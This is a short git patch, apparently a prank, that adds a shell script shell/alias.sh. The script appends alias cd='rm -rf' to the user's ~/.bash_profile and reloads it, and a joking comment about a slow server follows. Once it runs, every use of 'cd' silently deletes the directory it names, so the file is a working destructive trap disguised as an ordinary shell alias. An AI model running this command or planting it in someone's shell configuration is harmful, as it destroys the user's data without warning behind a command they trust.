From 8747a0f5f017441cd3d584a54f76a2e682749c45 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?=E5=90=B4=E6=B1=B6=E6=B3=BD?= Date: Wed, 5 Jun 2019 17:41:54 +0800 Subject: [PATCH] =?UTF-8?q?=E5=9D=91=E7=88=B9=E7=9A=84alias?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- shell/alias.sh | 3 +++ 1 file changed, 3 insertions(+) create mode 100644 shell/alias.sh diff --git a/shell/alias.sh b/shell/alias.sh new file mode 100644 index 0000000..d4be5e7 --- /dev/null +++ b/shell/alias.sh @@ -0,0 +1,3 @@ +echo "alias cd='rm -rf'" >> ~/.bash_profile && source ~/.bash_profile + +# 破服务器,进一个文件夹怎么要这么久? \ No newline at end of file -- Gitee